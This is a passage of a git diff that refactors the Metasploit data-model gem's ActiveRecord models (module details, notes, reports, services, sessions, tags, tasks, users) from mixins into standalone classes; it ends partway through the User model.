--git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_arch.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_arch.rb index 656068d39f..b27656ac87 100644 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_arch.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_arch.rb @@ -1,9 +1,17 @@ -module MetasploitDataModels::ActiveRecordModels::ModuleArch - def self.included(base) - base.class_eval{ - base.table_name = "module_archs" - belongs_to :module_detail - validate :name, :presence => true - } - end +class Mdm::ModuleArch < ActiveRecord::Base + self.table_name = 'module_archs' + + # + # Relations + # + + belongs_to :module_detail, :class_name => 'Mdm::ModuleDetail' + + # + # Validations + # + + validate :name, :presence => true + + ActiveSupport.run_load_hooks(:mdm_module_arch, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_author.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_author.rb index b279c88043..22f98fd7c8 100644 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_author.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_author.rb @@ -1,9 +1,17 @@ -module MetasploitDataModels::ActiveRecordModels::ModuleAuthor - def self.included(base) - base.class_eval{ - base.table_name = "module_authors" - belongs_to :module_detail - validate :name, :presence => true - } - end +class Mdm::ModuleAuthor < ActiveRecord::Base + self.table_name = 'module_authors' + + # + # Relations + # + + belongs_to :module_detail + + # + # Validations + # + + validate :name, :presence => true + + ActiveSupport.run_load_hooks(:mdm_module_author, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_detail.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_detail.rb index 503e39869b..0e8dd17fa1 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_detail.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_detail.rb @@ -1,67 +1,73 @@ -module MetasploitDataModels::ActiveRecordModels::ModuleDetail - def self.included(base) - base.class_eval { - base.table_name = "module_details" +class Mdm::ModuleDetail < ActiveRecord::Base + self.table_name = 'module_details' - has_many :authors, :class_name => "Mdm::ModuleAuthor", :dependent => :destroy, :source => :module_author - has_many :mixins, :class_name => "Mdm::ModuleMixin", :dependent => :destroy, :source => :module_mixin - has_many :targets, :class_name => "Mdm::ModuleTarget", :dependent => :destroy, :source => :module_target - has_many :actions, :class_name => "Mdm::ModuleAction", :dependent => :destroy, :source => :module_action - has_many :refs, :class_name => "Mdm::ModuleRef", :dependent => :destroy, :source => :module_ref - has_many :archs, :class_name => "Mdm::ModuleArch", :dependent => :destroy, :source => :module_arch - has_many :platforms, :class_name => "Mdm::ModulePlatform", :dependent => :destroy, :source => :module_platform + # + # Relations + # - validate :refname, :presence => true + has_many :actions, :class_name => 'Mdm::ModuleAction', :dependent => :destroy, :source => :module_action + has_many :archs, :class_name => 'Mdm::ModuleArch', :dependent => :destroy, :source => :module_arch + has_many :authors, :class_name => 'Mdm::ModuleAuthor', :dependent => :destroy, :source => :module_author + has_many :mixins, :class_name => 'Mdm::ModuleMixin', :dependent => :destroy, :source => :module_mixin + has_many :platforms, :class_name => 'Mdm::ModulePlatform', :dependent => :destroy, :source => :module_platform + has_many :refs, :class_name => 'Mdm::ModuleRef', :dependent => :destroy, :source => :module_ref + has_many :targets, :class_name => 'Mdm::ModuleTarget', :dependent => :destroy, :source => :module_target - validates_associated :authors - validates_associated :mixins - validates_associated :targets - validates_associated :actions - validates_associated :archs - validates_associated :platforms - validates_associated :refs + # + # Validations + # - def add_author(name, email=nil) - if email - r = self.authors.build(:name => name, :email => email).save - else - self.authors.build(:name => name).save - end - end + validate :refname, :presence => true - def add_mixin(name) - self.mixins.build(:name => name).save - end + validates_associated :actions + validates_associated :archs + validates_associated :authors + validates_associated :mixins + validates_associated :platforms + validates_associated :refs + validates_associated :targets - def add_target(idx, name) - self.targets.build(:index => idx, :name => name).save - end - - def add_action(name) - self.actions.build(:name => name).save - end - - def add_ref(name) - self.refs.build(:name => name).save - end - - def add_arch(name) - self.archs.build(:name => name).save - end - - def add_platform(name) - self.platforms.build(:name => name).save - end - - def before_destroy - Mdm::ModuleAuthor.delete_all('module_detail_id = ?', self.id) - Mdm::ModuleMixin.delete_all('module_detail_id = ?', self.id) - Mdm::ModuleTarget.delete_all('module_detail_id = ?', self.id) - Mdm::ModuleAction.delete_all('module_detail_id = ?', self.id) - Mdm::ModuleRef.delete_all('module_detail_id = ?', self.id) - Mdm::ModuleArch.delete_all('module_detail_id = ?', self.id) - Mdm::ModulePlatform.delete_all('module_detail_id = ?', self.id) - end - } + def add_author(name, email=nil) + if email + r = self.authors.build(:name => name, :email => email).save + else + self.authors.build(:name => name).save + end end + + def add_mixin(name) + self.mixins.build(:name => name).save + end + + def add_target(idx, name) + self.targets.build(:index => idx, :name => name).save + end + + def add_action(name) + self.actions.build(:name => name).save + end + + def add_ref(name) + self.refs.build(:name => name).save + end + + def add_arch(name) + self.archs.build(:name => name).save + end + + def add_platform(name) + self.platforms.build(:name => name).save + end + + def before_destroy + Mdm::ModuleAuthor.delete_all('module_detail_id = ?', self.id) + Mdm::ModuleMixin.delete_all('module_detail_id = ?', self.id) + Mdm::ModuleTarget.delete_all('module_detail_id = ?', self.id) + Mdm::ModuleAction.delete_all('module_detail_id = ?', self.id) + Mdm::ModuleRef.delete_all('module_detail_id = ?', self.id) + Mdm::ModuleArch.delete_all('module_detail_id = ?', self.id) + Mdm::ModulePlatform.delete_all('module_detail_id = ?', self.id) + end + + ActiveSupport.run_load_hooks(:mdm_module_detail, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_mixin.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_mixin.rb index 8f0258d4a1..89b86c4061 100644 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_mixin.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_mixin.rb @@ -1,9 +1,17 @@ -module MetasploitDataModels::ActiveRecordModels::ModuleMixin - def self.included(base) - base.class_eval{ - base.table_name = "module_mixins" - belongs_to :module_detail - validate :name, :presence => true - } - end +class Mdm::ModuleMixin < ActiveRecord::Base + self.table_name = 'module_mixins' + + # + # Relations + # + + belongs_to :module_detail, :class_name => 'Mdm::ModuleDetail' + + # + # Validation + # + + validate :name, :presence => true + + ActiveSupport.run_load_hooks(:mdm_module_mixin, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_platform.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_platform.rb index 9d484e42f8..83f897fb13 100644 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_platform.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_platform.rb @@ -1,9 +1,17 @@ -module MetasploitDataModels::ActiveRecordModels::ModulePlatform - def self.included(base) - base.class_eval{ - base.table_name = "module_platforms" - belongs_to :module_detail - validate :name, :presence => true - } - end +class Mdm::ModulePlatform < ActiveRecord::Base + self.table_name = 'module_platforms' + + # + # Relations + # + + belongs_to :module_detail + + # + # Validations + # + + validate :name, :presence => true + + ActiveSupport.run_load_hooks(:mdm_module_platform, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_ref.rb index 8bffa365a9..6368d8d02f 100644 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_ref.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_ref.rb @@ -1,9 +1,17 @@ -module MetasploitDataModels::ActiveRecordModels::ModuleRef - def self.included(base) - base.class_eval{ - base.table_name = "module_refs" - belongs_to :module_detail - validate :name, :presence => true - } - end +class Mdm::ModuleRef < ActiveRecord::Base + self.table_name = 'module_refs' + + # + # Relations + # + + belongs_to :module_detail, :class_name => 'Mdm::ModuleDetail' + + # + # Validations + # + + validate :name, :presence => true + + ActiveSupport.run_load_hooks(:mdm_module_ref, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_target.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_target.rb index 7e52b1a296..b3e3b026f8 100644 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_target.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/module_target.rb @@ -1,9 +1,17 @@ -module MetasploitDataModels::ActiveRecordModels::ModuleTarget - def self.included(base) - base.class_eval{ - base.table_name = "module_targets" - belongs_to :module_detail - validate :name, :presence => true - } - end +class Mdm::ModuleTarget < ActiveRecord::Base + self.table_name = 'module_targets' + + # + # Relations + # + + belongs_to :module_detail + + # + # Validators + # + + validate :name, :presence => true + + ActiveSupport.run_load_hooks(:mdm_module_target, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/nexpose_console.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/nexpose_console.rb index fd31df59f5..fd40f462d8 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/nexpose_console.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/nexpose_console.rb @@ -1,14 +1,20 @@ -module MetasploitDataModels::ActiveRecordModels::NexposeConsole - def self.included(base) - base.class_eval{ - serialize :cached_sites, ::MetasploitDataModels::Base64Serializer.new +class Mdm::NexposeConsole < ActiveRecord::Base + # + # Serializations + # - validates :name, :presence => true - validates :address, :presence => true - validates :username, :presence => true - validates :password, :presence => true - validates :port, :inclusion => {:in => 1..65535} - } - end + serialize :cached_sites, MetasploitDataModels::Base64Serializer.new + + # + # Validations + # + + validates :address, :presence => true + validates :name, :presence => true + validates :password, :presence => true + validates :port, :inclusion => {:in => 1..65535} + validates :username, :presence => true + + ActiveSupport.run_load_hooks(:mdm_nexpose_console, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/note.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/note.rb index 5cee9628b9..a1e3d81671 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/note.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/note.rb @@ -1,34 +1,49 @@ -module MetasploitDataModels::ActiveRecordModels::Note - def self.included(base) - base.class_eval{ - notes = base.arel_table +class Mdm::Note < ActiveRecord::Base + # + # Callbacks + # - belongs_to :workspace, :class_name => "Mdm::Workspace" - belongs_to :host, :class_name => "Mdm::Host", :counter_cache => :note_count - belongs_to :service, :class_name => "Mdm::Service" - serialize :data, ::MetasploitDataModels::Base64Serializer.new + after_save :normalize - scope :flagged, where('critical = true AND seen = false') - scope :visible, where(notes[:ntype].not_in(['web.form', 'web.url', 'web.vuln'])) - scope :search, lambda { |*args| - where(["(data NOT ILIKE 'BAh7%' AND data LIKE ?)" + - "OR (data ILIKE 'BAh7%' AND decode(data, 'base64') LIKE ?)" + - "OR ntype ILIKE ?", - "%#{args[0]}%", "%#{args[0]}%", "%#{args[0]}%" - ]) - } + # + # Relations + # + belongs_to :workspace, :class_name => "Mdm::Workspace" + belongs_to :host, :class_name => "Mdm::Host", :counter_cache => :note_count + belongs_to :service, :class_name => "Mdm::Service" - after_save :normalize + # + # Scopes + # - private + scope :flagged, where('critical = true AND seen = false') - def normalize - if data_changed? and ntype =~ /fingerprint/ - host.normalize_os - end - end - } + notes = self.arel_table + scope :visible, where(notes[:ntype].not_in(['web.form', 'web.url', 'web.vuln'])) + + scope :search, lambda { |*args| + where(["(data NOT ILIKE 'BAh7%' AND data LIKE ?)" + + "OR (data ILIKE 'BAh7%' AND decode(data, 'base64') LIKE ?)" + + "OR ntype ILIKE ?", + "%#{args[0]}%", "%#{args[0]}%", "%#{args[0]}%" + ]) + } + + # + # Serializations + # + + serialize :data, ::MetasploitDataModels::Base64Serializer.new + + private + + def normalize + if data_changed? and ntype =~ /fingerprint/ + host.normalize_os + end end + + ActiveSupport.run_load_hooks(:mdm_note, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/profile.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/profile.rb index 3808701ce1..931ebf20af 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/profile.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/profile.rb @@ -1,8 +1,9 @@ -module MetasploitDataModels::ActiveRecordModels::Profile - def self.included(base) - base.class_eval{ - serialize :settings, ::MetasploitDataModels::Base64Serializer.new - } - end +class Mdm::Profile < ActiveRecord::Base + # + # Serializations + # + serialize :settings, MetasploitDataModels::Base64Serializer.new + + ActiveSupport.run_load_hooks(:mdm_profile, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/ref.rb index e253bbbe1e..f7b7465e4a 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/ref.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/ref.rb @@ -1,8 +1,14 @@ -module MetasploitDataModels::ActiveRecordModels::Ref - def self.included(base) - base.class_eval{ - has_many :vulns, :through => :vulns_refs, :class_name => "Mdm::Vuln" - has_many :vulns_refs, :class_name => "Mdm::VulnRef" - } - end +class Mdm::Ref < ActiveRecord::Base + # + # Relations + # + + has_many :vulns_refs, :class_name => 'Mdm::VulnRef' + + # + # Through :vuln_refs + # + has_many :vulns, :class_name => 'Mdm::Vuln', :through => :vulns_refs + + ActiveSupport.run_load_hooks(:mdm_ref, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/report.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/report.rb index 1dee83259b..4bfa39767c 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/report.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/report.rb @@ -1,29 +1,50 @@ -module MetasploitDataModels::ActiveRecordModels::Report - def self.included(base) - base.class_eval { +class Mdm::Report < ActiveRecord::Base + # + # Callbacks + # - belongs_to :workspace, :class_name => "Mdm::Workspace" - serialize :options, ::MetasploitDataModels::Base64Serializer.new + before_destroy :delete_file - validates_format_of :name, :with => /^[A-Za-z0-9\x20\x2e\x2d\x5f\x5c]+$/, :message => "name must consist of A-Z, 0-9, space, dot, underscore, or dash", :allow_blank => true + # + # Relations + # - serialize :options, MetasploitDataModels::Base64Serializer.new + belongs_to :workspace, :class_name => 'Mdm::Workspace' - before_destroy :delete_file + # + # Scopes + # - scope :flagged, where('reports.downloaded_at is NULL') + scope :flagged, where('reports.downloaded_at is NULL') - private + # + # Serializations + # - def delete_file - c = Pro::Client.get rescue nil - if c - c.report_delete_file(self[:id]) - else - ::File.unlink(self.path) rescue nil - end - end - } + serialize :options, MetasploitDataModels::Base64Serializer.new + + # + # Validations + # + + validates :name, + :format => { + :allow_blank => true, + :message => "name must consist of A-Z, 0-9, space, dot, underscore, or dash", + :with => /^[A-Za-z0-9\x20\x2e\x2d\x5f\x5c]+$/ + } + + private + + def delete_file + c = Pro::Client.get rescue nil + if c + c.report_delete_file(self[:id]) + else + ::File.unlink(self.path) rescue nil + end end + + ActiveSupport.run_load_hooks(:mdm_report, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/report_template.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/report_template.rb index 9d42c2d6a3..b50b88f13e 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/report_template.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/report_template.rb @@ -1,22 +1,27 @@ -module MetasploitDataModels::ActiveRecordModels::ReportTemplate - def self.included(base) - base.class_eval{ +class Mdm::ReportTemplate < ActiveRecord::Base + # + # Callbacks + # - belongs_to :workspace, :class_name => "Mdm::Workspace" + before_destroy :delete_file - before_destroy :delete_file + # + # Relations + # - private + belongs_to :workspace, :class_name => 'Mdm::Workspace' - def delete_file - c = Pro::Client.get rescue nil - if c - c.report_template_delete_file(self[:id]) - else - ::File.unlink(self.path) rescue nil - end - end - } + private + + def delete_file + c = Pro::Client.get rescue nil + if c + c.report_template_delete_file(self[:id]) + else + ::File.unlink(self.path) rescue nil + end end + + ActiveSupport.run_load_hooks(:mdm_report_template, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/route.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/route.rb index a10a3f96a8..4d13ef2f17 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/route.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/route.rb @@ -1,7 +1,9 @@ -module MetasploitDataModels::ActiveRecordModels::Route - def self.included(base) - base.class_eval{ - belongs_to :session, :class_name => "Mdm::Session" - } - end +class Mdm::Route < ActiveRecord::Base + # + # Relations + # + + belongs_to :session, :class_name => 'Mdm::Session' + + ActiveSupport.run_load_hooks(:mdm_route, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/service.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/service.rb index fb97bed99b..484555b38f 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/service.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/service.rb @@ -1,42 +1,56 @@ -module MetasploitDataModels::ActiveRecordModels::Service - def self.included(base) - base.class_eval{ - eval("STATES = ['open', 'closed', 'filtered', 'unknown']") unless defined? STATES - has_many :vulns, :dependent => :destroy, :class_name => "Mdm::Vuln" - has_many :notes, :dependent => :destroy, :class_name => "Mdm::Note" - has_many :creds, :dependent => :destroy, :class_name => "Mdm::Cred" - has_many :exploited_hosts, :dependent => :destroy, :class_name => "Mdm::ExploitedHost" - has_many :web_sites, :dependent => :destroy, :class_name => "Mdm::WebSite" - has_many :web_pages, :through => :web_sites, :class_name => "Mdm::WebPage" - has_many :web_forms, :through => :web_sites, :class_name => "Mdm::WebForm" - has_many :web_vulns, :through => :web_sites, :class_name => "Mdm::WebVuln" +class Mdm::Service < ActiveRecord::Base + # + # Callbacks + # - belongs_to :host, :class_name => "Mdm::Host", :counter_cache => :service_count + after_save :normalize_host_os - has_many :web_pages, :through => :web_sites - has_many :web_forms, :through => :web_sites - has_many :web_vulns, :through => :web_sites + # + # CONSTANTS + # - scope :inactive, where("services.state != 'open'") - scope :with_state, lambda { |a_state| where("services.state = ?", a_state)} - scope :search, lambda { |*args| - where([ - "services.name ILIKE ? OR " + - "services.info ILIKE ? OR " + - "services.proto ILIKE ? OR " + - "services.port = ? ", - "%#{args[0]}%", "%#{args[0]}%", "%#{args[0]}%", (args[0].to_i > 0) ? args[0].to_i : 99999 - ]) - } + STATES = ['open', 'closed', 'filtered', 'unknown'] - after_save :normalize_host_os + # + # Relations + # - def normalize_host_os - if info_changed? - host.normalize_os - end - end - } + has_many :creds, :dependent => :destroy, :class_name => 'Mdm::Cred' + has_many :exploited_hosts, :dependent => :destroy, :class_name => 'Mdm::ExploitedHost' + belongs_to :host, :class_name => 'Mdm::Host', :counter_cache => :service_count + has_many :notes, :dependent => :destroy, :class_name => 'Mdm::Note' + has_many :vulns, :dependent => :destroy, :class_name => 'Mdm::Vuln' + has_many :web_sites, :dependent => :destroy, :class_name => 'Mdm::WebSite' + + # + # Through :web_sites + # + has_many :web_pages, :through => :web_sites, :class_name => 'Mdm::WebPage' + has_many :web_forms, :through => :web_sites, :class_name => 'Mdm::WebForm' + has_many :web_vulns, :through => :web_sites, :class_name => 'Mdm::WebVuln' + + # + # Scopes + # + + scope :inactive, where("services.state != 'open'") + scope :with_state, lambda { |a_state| where("services.state = ?", a_state)} + scope :search, lambda { |*args| + where([ + "services.name ILIKE ? OR " + + "services.info ILIKE ? OR " + + "services.proto ILIKE ? OR " + + "services.port = ? ", + "%#{args[0]}%", "%#{args[0]}%", "%#{args[0]}%", (args[0].to_i > 0) ? args[0].to_i : 99999 + ]) + } + + def normalize_host_os + if info_changed? + host.normalize_os + end end + + ActiveSupport.run_load_hooks(:mdm_service, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/session.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/session.rb index 1fa49e9778..7c13da2706 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/session.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/session.rb @@ -1,33 +1,48 @@ -module MetasploitDataModels::ActiveRecordModels::Session - def self.included(base) - base.class_eval { - belongs_to :host, :class_name => "Mdm::Host" +class Mdm::Session < ActiveRecord::Base + # + # Callbacks + # - has_one :workspace, :through => :host, :class_name => "Mdm::Workspace" + before_destroy :stop - has_many :events, :class_name => "Mdm::SessionEvent", :order => "created_at", :dependent => :delete_all - has_many :routes, :class_name => "Mdm::Route", :dependent => :delete_all + # + # Relations + # - scope :alive, where("closed_at IS NULL") - scope :dead, where("closed_at IS NOT NULL") - scope :upgradeable, where("closed_at IS NULL AND stype = 'shell' and platform ILIKE '%win%'") + has_many :events, :class_name => 'Mdm::SessionEvent', :order => 'created_at', :dependent => :delete_all + belongs_to :host, :class_name => 'Mdm::Host' + has_many :routes, :class_name => 'Mdm::Route', :dependent => :delete_all - serialize :datastore, ::MetasploitDataModels::Base64Serializer.new + # + # Through :host + # + has_one :workspace, :through => :host, :class_name => 'Mdm::Workspace' - before_destroy :stop - - def upgradeable? - (self.platform =~ /win/ and self.stype == 'shell') - end - + # + # Scopes + # - private + scope :alive, where('closed_at IS NULL') + scope :dead, where('closed_at IS NOT NULL') + scope :upgradeable, where("closed_at IS NULL AND stype = 'shell' and platform ILIKE '%win%'") - def stop - c = Pro::Client.get rescue nil - c.session_stop(self.local_id) rescue nil # ignore exceptions (XXX - ideally, stopped an already-stopped session wouldn't throw XMLRPCException) - end + # + # Serializations + # - } + serialize :datastore, ::MetasploitDataModels::Base64Serializer.new + + def upgradeable? + (self.platform =~ /win/ and self.stype == 'shell') end + + private + + def stop + c = Pro::Client.get rescue nil + # ignore exceptions (XXX - ideally, stopped an already-stopped session wouldn't throw XMLRPCException) + c.session_stop(self.local_id) rescue nil + end + + ActiveSupport.run_load_hooks(:mdm_session, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/session_event.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/session_event.rb index 72f25d20b5..99cadd2243 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/session_event.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/session_event.rb @@ -1,8 +1,9 @@ -module MetasploitDataModels::ActiveRecordModels::SessionEvent - def self.included(base) - base.class_eval{ +class Mdm::SessionEvent < ActiveRecord::Base + # + # Relations + # - belongs_to :session, :class_name => "Mdm::Session" - } - end + belongs_to :session, :class_name => 'Mdm::Session' + + ActiveSupport.run_load_hooks(:mdm_session_event, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/tag.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/tag.rb index e87148f9b0..5f61c4da80 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/tag.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/tag.rb @@ -1,27 +1,46 @@ -module MetasploitDataModels::ActiveRecordModels::Tag - def self.included(base) - base.class_eval { - has_many :hosts_tags, :class_name => "Mdm::HostTag" - has_many :hosts, :through => :hosts_tags, :class_name => "Mdm::Host" +class Mdm::Tag < ActiveRecord::Base + # + # Callbacks + # - belongs_to :user, :class_name => "Mdm::User" + before_destroy :cleanup_hosts - validates :name, :presence => true, :format => { - :with => /^[A-Za-z0-9\x2e\x2d_]+$/, :message => "must be alphanumeric, dots, dashes, or underscores" - } - validates :desc, :length => {:maximum => 8191, :message => "desc must be less than 8k."} + # + # Relations + # - before_destroy :cleanup_hosts + has_many :hosts_tags, :class_name => 'Mdm::HostTag' + belongs_to :user, :class_name => 'Mdm::User' - def to_s - name - end + # + # Through :hosts_tags + # + has_many :hosts, :through => :hosts_tags, :class_name => 'Mdm::Host' - def cleanup_hosts - # Clean up association table records - Mdm::HostTag.delete_all("tag_id = #{self.id}") - end - - } + + # + # Validations + # + + validates :desc, + :length => { + :maximum => ((8 * (2 ** 10)) - 1), + :message => "desc must be less than 8k." + } + validates :name, + :format => { + :with => /^[A-Za-z0-9\x2e\x2d_]+$/, :message => "must be alphanumeric, dots, dashes, or underscores" + }, + :presence => true + + def cleanup_hosts + # Clean up association table records + Mdm::HostTag.delete_all("tag_id = #{self.id}") end + + def to_s + name + end + + ActiveSupport.run_load_hooks(:mdm_tag, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/task.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/task.rb index 57df49debf..7e63e9442d 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/task.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/task.rb @@ -1,28 +1,41 @@ -module MetasploitDataModels::ActiveRecordModels::Task - def self.included(base) - base.class_eval{ +class Mdm::Task < ActiveRecord::Base + # + # Callbacks + # - belongs_to :workspace, :class_name => "Mdm::Workspace" + before_destroy :delete_file - serialize :options, ::MetasploitDataModels::Base64Serializer.new - serialize :result, ::MetasploitDataModels::Base64Serializer.new - serialize :settings, ::MetasploitDataModels::Base64Serializer.new + # + # Relations + # - scope :running, order( "created_at DESC" ).where("completed_at IS NULL") + belongs_to :workspace, :class_name => "Mdm::Workspace" - before_destroy :delete_file + # + # Scopes + # - private + scope :running, order( "created_at DESC" ).where("completed_at IS NULL") - def delete_file - c = Pro::Client.get rescue nil - if c - c.task_delete_log(self[:id]) if c - else - ::File.unlink(self.path) rescue nil - end - end - } + # + # Serializations + # + + serialize :options, MetasploitDataModels::Base64Serializer.new + serialize :result, MetasploitDataModels::Base64Serializer.new + serialize :settings, MetasploitDataModels::Base64Serializer.new + + private + + def delete_file + c = Pro::Client.get rescue nil + if c + c.task_delete_log(self[:id]) if c + else + ::File.unlink(self.path) rescue nil + end end + + ActiveSupport.run_load_hooks(:mdm_task, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/user.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/user.rb index 4c56892f87..bdc5baae21 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/user.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.3.0/app/models/mdm/user.rb @@ -1,23 +1,32 @@ -module MetasploitDataModels::ActiveRecordModels::User - def self.included(base) - base.class_eval { - extend MetasploitDataModels::SerializedPrefs - serialize :prefs, ::MetasploitDataModels::Base64Serializer.new +class Mdm::User < ActiveRecord::Base + extend MetasploitDataModels::SerializedPrefs - has_and_belongs_to_many :workspaces, :join_table => "workspace_members", :uniq => true, :class_name => "Mdm::Workspace" - has_many :owned_workspaces, :foreign_key => "owner_id", :class_name => "Mdm::Workspace" - has_many :tags, :class_name => "Mdm::Tag" + # + # Relations + # - validates :password, :password_is_strong => true - validates :password_confirmation, :password_is_strong => true - + has_many :owned_workspaces, :foreign_key => 'owner_id', :class_name => 'Mdm::Workspace' + has_many :tags, :class_name => 'Mdm::Tag' + 